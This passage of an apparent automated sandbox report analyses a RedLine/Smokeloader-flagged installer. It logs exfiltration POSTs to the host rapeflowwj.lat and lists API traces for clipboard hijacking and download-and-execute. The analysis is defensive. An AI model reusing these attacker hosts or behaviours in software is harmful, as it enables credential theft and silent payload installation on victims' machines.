2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 6f 7a 32 35 76 64 41 61 72 36 42 6d 6f 59 64 74 68 50 42 45 61 51 61 45 48 76 54 76 62 78 49 70 2b 39 59 45 56 71 56 44 69 54 6a 75 6a 54 77 70 68 51 4c 71 79 52 76 77 4a 75 7a 4d 79 43 56 56 47 2b 69 7a 76 64 5a 6a 74 78 33 6e 54 2f 32 6a 2b 5a 76 46 47 4e 70 70 6e 4d 43 42 6a 71 71 74 52 2f 43 7a 62 50 54 78 50 47 6c 37 79 57 2b 38 35 79 5a 4c 52 61 5a 6e 6b 5a 65 30 45 6f 68 6f 6e 30 32 68 68 65 77 62 6c 2b 67 2b 36 50 64 73 72 50 41 35 5a 46 4c 41 54 72 43 76 62 6c 62 63 48 37 62 77 68 74 48 4c 2f 57 44 2b 6a 54 7a 52 75 53 4c 4f 76 56 2b 74 76 31 54 4e 7a 43 51 49 2f 34 6c 33 6a 4f 39 76 45 79 51 61 46 2f 79 6a 2b 43 37 4a 39 4f 35 4e 2f 4a 6e 74 58 38 49 35 43 36 79 57 36 66 6d 78 4f 47 6b 6a 69 45 2b 39 6c 69 35 7a 4a 50 64 72 2f 61 4f 34 42 71 52 Data Ascii: oz25vdAar6BmoYdthPBEaQaEHvTvbxIp+9YEVqVDiTjujTwphQLqyRvwJuzMyCVVG+izvdZjtx3nT/2j+ZvFGNppnMCBjqqtR/CzbPTxPGl7yW+85yZLRaZnkZe0Eohon02hhewbl+g+6PdsrPA5ZFLATrCvblbcH7bwhtHL/WD+jTzRuSLOvV+tv1TNzCQI/4l3jO9vEyQaF/yj+C7J9O5N/JntX8I5C6yW6fmxOGkjiE+9li5zJPdr/aO4BqR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49708	172.67.220.223	443	3032	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:38 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=99VJBESC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12781 Host: rapeflowwj.lat
2024-12-18 12:49:38 UTC	12781	OUT	Data Raw: 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 Data Ascii: --99VJBESCContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--99VJBESCContent-Disposition: form-data; name="pid"2--99VJBESCContent-Disposition: form-data; name="lid"4h5VfH----99VJBESCContent-Disposition:
2024-12-18 12:49:38 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4et6k00vsf7n28do9pn8kvl3i3; expires=Sun, 13-Apr-2025 06:36:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AF4pYnIEzdKwq6OvDoB0Xt2AZBrIXwqDDHAxhhV8tCnoZ%2FFiqlb0ZTkQ2pm5yht8QsUBoEksZeZa9rvVWwdsyYFLsHFraUGs3u9sdIjIegNPCeBvVXi%2BFI1GjVoilpmPHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46265c505e61-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1722&rtt_var=660&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13709&delivery_rate=1640449&cwnd=209&unsent_bytes=0&cid=a73c39f05ea7c67a&ts=856&x=0"
2024-12-18 12:49:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49711	172.67.220.223	443	3032	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:40 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5TJ6E56H7BJU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: rapeflowwj.lat
2024-12-18 12:49:40 UTC	15034	OUT	Data Raw: 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 Data Ascii: --5TJ6E56H7BJUContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--5TJ6E56H7BJUContent-Disposition: form-data; name="pid"2--5TJ6E56H7BJUContent-Disposition: form-data; name="lid"4h5VfH----5TJ6E56H7BJUConte
2024-12-18 12:49:41 UTC	1034	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a1usne3eafdg3t894et4gv2dmo; expires=Sun, 13-Apr-2025 06:36:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYUtBy6cVfXOykZEC4sDuqNUkTuAdwtdveNTzl6upbLEcGuaJZ8R3xpdMNSVyLltIibOJGHndirZgE891QIk5F6GZ8V7dd7o1ytP1FMWzY8yKEg967MuSrzCTJTvVwPHDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46345b4fef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1820&rtt_var=715&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15966&delivery_rate=1495135&cwnd=121&unsent_bytes=0&cid=8c75469e7623a151&ts=769&x=0"
2024-12-18 12:49:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	172.67.220.223	443	3032	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:42 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=72ERRQ127ZK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20195 Host: rapeflowwj.lat
2024-12-18 12:49:42 UTC	15331	OUT	Data Raw: 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --72ERRQ127ZKContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--72ERRQ127ZKContent-Disposition: form-data; name="pid"3--72ERRQ127ZKContent-Disposition: form-data; name="lid"4h5VfH----72ERRQ127ZKContent-D
2024-12-18 12:49:42 UTC	4864	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
2024-12-18 12:49:44 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lhi7ogemt6cfi6jde2qv3ll1v5; expires=Sun, 13-Apr-2025 06:36:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMUrU9orUfwc5NXwHTsZTwXivtZWxGdKZIJiFjmRvYxGGYFJY%2FVB3oZUPLOYlec2bAfOteAP2ksoOybBLmO3ptnTt0vRBHBndDwd4%2BqJh0o9NLZnErbHncpbJqxqCmn8%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46431a6cc439-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1485&rtt_var=577&sent=17&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21148&delivery_rate=1864623&cwnd=207&unsent_bytes=0&cid=c5ee44dccedb3731&ts=1683&x=0"
2024-12-18 12:49:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:49:19
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\InstallSetup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\InstallSetup.exe"
Imagebase:	0x400000
File size:	436'736 bytes
MD5 hash:	8D746459E4ECDC159BD431BBC01E9672
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:49:27
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"
Imagebase:	0x400000
File size:	368'128 bytes
MD5 hash:	9026F04B1266851659FB62C91BD7F2F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:49:43
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952
Imagebase:	0x310000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	3.4%
Signature Coverage:	4.9%
Total number of Nodes:	878
Total number of Limit Nodes:	19

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

<, xrefs: 00402B45
ShareScreen, xrefs: 00402A12
.exe, xrefs: 00402A6B

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 00C016B6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00C016DE
Module32First.KERNEL32(00000000,00000224), ref: 00C016FE

Memory Dump Source

Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6319b9342f89a6058f45fb31a4f4ce8e8c9e7b69beb5de2a55a9ea06e482c83f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 38F062356007106FD7203AF99C8DA6BB6E8EF49725F180528FA52914C0DA71ED458A61

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0094003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0094024D

Strings

cess, xrefs: 0094018D
kernel32.dll, xrefs: 0094008F, 00940095

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0f2563c088c55e369c8b99a75913258639d7b91ed0990f4b75a4850b41703535
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F1526774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB351DB34AE85DF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
ShareScreen, xrefs: 00402C22
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

